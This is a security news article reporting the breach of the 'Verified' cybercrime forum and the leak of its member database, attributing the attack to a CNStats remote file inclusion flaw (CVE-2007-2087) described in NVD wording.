Large communities of Eastern Europe cybercriminals Verified was hacked

One of the largest communities of Eastern Europe cybercriminals “Verified” was hacked, more than 18,894 bad actors revealed after several hours.

According to sources at IntelCrawler, cyberintelligence firm from Los Angeles, the largest community of Eastern Europe cybercriminals “Verified” was hacked several hours ago.

The hackers hit the online community stealing member information and login credentials from the site’s forum database late Tuesday, it is still not confirmed, but the attackers could be members of a rival cyber gang managing a crime forum.

IntelCrawler is one of the most interesting realities in the cyberintelligence scenario, a few weeks ago they discovered a Russian-speaking group offers bulletproof hosting in Syria and Lebanon, just yesterday I published a post on another analysis made by its specialists on VSAT terminals vulnerabilities.

The event is considerable serious in the underground communities, security and anonymity are requirements fundamental for the model of sale known as fraud-as-a-service, specialized forums like Verified offer product and services to criminal gangs to advantage their illegal activities. The Verified forum is specialized in online banking and financial frauds against organizations in US, UK and Australia.

«It is good example, that there is insecurity of cybercriminals communities too, besides resources they prefer to hack. Sometimes it helps investigators to find bad actors profiles and to arrest them, doing deep e-crime intelligence» – comment IntelCrawler researchers.

The Verified data breach exposed all the uploaded attachments on forum since 2011, as well as to download MySQL database with all cybercriminals user accounts and credentials.

The attack was very smart, the hackers have exploited a vulnerability in one of third party WEB-applications used for traffic and statistics monitoring «CNStats STD 4.3» – CVE-2007-2087.

 “Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.” is the description of the vulnerability from National vulnerability Database.

The database was uploaded to Sendspace and according to operative information the responsible for the attack are the owners of another cyber criminal forum.

Giving a closer look to the dump of the Database it is possible to find the name of popular cyber criminals, including the famous spammer “SEVERA”, former partner of Alan Ralsky, arrested by US LEA. “Severa” is also widely known as spammer, who had one of the first spam services on famous underground forum “Carberplant” closed by LEA quite long time ago. On January 8th, 2014 Ukrainian SBU has announced the arrest of the hacker “4×4” (UA), “4×4” was also a member of Verified hacked forum, as well as other famous cybercriminal such as Zoomer and KrenJo (very famous dumps sellers from Eastern Europe).

Some of user accounts are dated, they were created in 2005 when the community was just created, in terms of security most of the users are using e-mails in various jurisdictions and “safe-mail.net”.

The community, born in 2005, became very popular for trading of new exploit-kits, the author of “Blackhole” Exploit-Kit Paunch was one the advertisers there.

Pierluigi Paganini

(Security Affairs –  Verified forum, cybercrime)